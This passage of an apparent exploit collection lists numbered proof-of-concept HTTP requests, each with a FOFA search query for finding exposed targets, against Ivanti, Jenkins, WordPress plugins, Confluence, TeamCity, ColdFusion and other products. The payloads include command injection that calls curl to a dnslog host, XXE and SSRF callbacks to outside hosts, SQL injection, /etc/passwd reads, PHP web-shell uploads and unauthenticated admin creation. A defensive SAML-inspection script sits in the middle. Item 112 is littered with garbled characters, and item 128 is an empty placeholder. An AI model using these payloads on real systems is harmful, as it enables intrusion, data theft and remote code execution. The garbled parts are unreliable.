------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <ds:SignatureValue>qwerty</ds:SignatureValue>
      <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/>
        <ds:X509Data/>
      </ds:KeyInfo>
      <ds:Object></ds:Object>
    </ds:Signature>
  </soap:Body>
</soap:Envelope>

The RetrievalMethod URI is the SSRF sink: a DNS or HTTP callback to the host placed there confirms the issue.

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 of the following XML (an external parameter entity that makes the parser fetch the attacker's URL):
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

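Sections 102 and 103 both smuggle an outbound fetch inside XML that the appliance parses: an XML-DSig RetrievalMethod in the SOAP body, and an external parameter entity inside a base64-encoded SAMLRequest. The script below is an added example (not from the original post, watchTowr or Ivanti) that a defender can run over captured request bodies or WAF logs: it unwraps a SAMLRequest (percent-encoding, base64, and raw DEFLATE for the Redirect binding), then flags any DOCTYPE, any external entity declaration, and any fetchable URL whose host is not a trusted IdP. The trusted-host list and the benign AuthnRequest are constructed for the example; the two malicious inputs are the ones shown on the page.

```python
import base64
import re
import zlib
from typing import Dict, Iterable, List
from urllib.parse import unquote, urlsplit

DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.I)
EXT_ENTITY_RE = re.compile(rb"<!ENTITY\b[^>]*\b(?:SYSTEM|PUBLIC)\b", re.I)
# URLs an XML or XML-DSig processor would fetch on its own: external DTD/entity
# system identifiers and a RetrievalMethod reference inside ds:KeyInfo.
FETCH_URL_RE = re.compile(
    rb'SYSTEM\s*"([^"]+)"|SYSTEM\s*\'([^\']+)\'|RetrievalMethod\b[^>]*\bURI="([^"]+)"', re.I)


def decode_saml_request(value: str) -> bytes:
    """Undo the layers a SAMLRequest parameter can carry: percent-encoding, base64 and,
    for the HTTP-Redirect binding, raw DEFLATE. unquote() instead of unquote_plus() so a
    literal '+' from the base64 alphabet (as in the POC value) is not turned into a space."""
    b64 = unquote(value).strip()
    b64 += "=" * (-len(b64) % 4)          # tolerate stripped padding
    raw = base64.b64decode(b64)
    if raw.lstrip().startswith(b"<"):     # already plain XML (POST binding)
        return raw
    try:
        return zlib.decompress(raw, -15)  # raw DEFLATE, no zlib header
    except zlib.error:
        return raw


def fetch_targets(xml: bytes) -> List[str]:
    return [next(g for g in m.groups() if g).decode("latin-1") for m in FETCH_URL_RE.finditer(xml)]


def inspect_xml(xml: bytes, trusted_hosts: Iterable[str]) -> Dict[str, object]:
    """Flag DOCTYPE/external entities and any fetch target outside the trusted IdP hosts."""
    trusted = {h.lower() for h in trusted_hosts}
    external = []
    for url in fetch_targets(xml):
        host = urlsplit(url).hostname
        if host and host.lower() not in trusted:
            external.append(host)
    doctype = bool(DOCTYPE_RE.search(xml))
    return {
        "doctype": doctype,
        "external_entity": bool(EXT_ENTITY_RE.search(xml)),
        "external_hosts": external,
        "suspicious": doctype or bool(external),
    }


def inspect_saml_request(value: str, trusted_hosts: Iterable[str]) -> Dict[str, object]:
    return inspect_xml(decode_saml_request(value), trusted_hosts)


# The SAMLRequest value from the CVE-2024-22024 POC above.
POC_SAML_REQUEST = ("PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0K"
                    "ICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==")

# The SOAP body from the CVE-2024-21893 POC above, with the whitespace removed.
POC_SAML20_WS_BODY = (
    b'<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
    b'<soap:Body><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo>'
    b'<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>'
    b'<ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/></ds:SignedInfo>'
    b'<ds:SignatureValue>qwerty</ds:SignatureValue>'
    b'<ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" '
    b'xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">'
    b'<ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/></ds:KeyInfo>'
    b'<ds:Object></ds:Object></ds:Signature></soap:Body></soap:Envelope>')

# A constructed, benign AuthnRequest in the deflate+base64 form of the Redirect binding.
_BENIGN_XML = (b'<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="_1" Version="2.0" '
               b'IssueInstant="2024-02-09T00:00:00Z" Destination="https://sso.example.com/saml"/>')
_deflater = zlib.compressobj(9, zlib.DEFLATED, -15)
BENIGN_SAML_REQUEST = base64.b64encode(_deflater.compress(_BENIGN_XML) + _deflater.flush()).decode()

if __name__ == "__main__":
    print("CVE-2024-22024 sample:", inspect_saml_request(POC_SAML_REQUEST, ["sso.example.com"]))
    print("CVE-2024-21893 sample:", inspect_xml(POC_SAML20_WS_BODY, ["sso.example.com"]))
    print("benign sample:", inspect_saml_request(BENIGN_SAML_REQUEST, ["sso.example.com"]))
```

Two details matter for not missing real traffic: the `+` in the POC's base64 must survive decoding (form decoders that map `+` to space would break it, which is also why the check uses `unquote`), and Redirect-binding requests are deflated before base64, so a detector that only base64-decodes would see compressed bytes and report nothing.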
104. TOTOLINK T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-Type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Response (the file's first line comes back as the "default" of the COMMAND argument, the second as the rejected extra argument):
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL 注入& @- b& J% w% Z# u! }: N
CVE-2024-1698
; {: b, X5 V1 z; g- NFOFA:body="/wp-content/plugins/notificationx"
- k$ b) h9 v. ^1 R  GPOST /wp-json/notificationx/v1/analytics HTTP/1.1. a; {* i* l1 M: P. @, o
Host: {{Hostname}}  [2 q/ K& @9 g2 i# ^  C
Content-Type: application/json
# K$ k; U- i5 A1 N% Z: L0 ]% ]" f
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
. L1 i/ J% G# z1 T' G0 ]1 B  @1 U; |! n- k
, m1 W# I6 I: H6 V/ ^# z
113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA:body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress JS Support Ticket plugin file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Versions: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo (百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php (the txt_path field decides where the uploaded file is written).

119. Beijing Baichuo (百绰) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://x.x.x.x:8443
Referer: https://x.x.x.x:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo (百绰) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

File path after upload: /upload/2.php

121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

boot/web/upload/weblogo/1.php

122. 北京百绰智能 s200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement in base64 encoding; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. 湖南建研 engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user is created, log in to the backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. 广联达 Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier), and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer-service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Backend address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

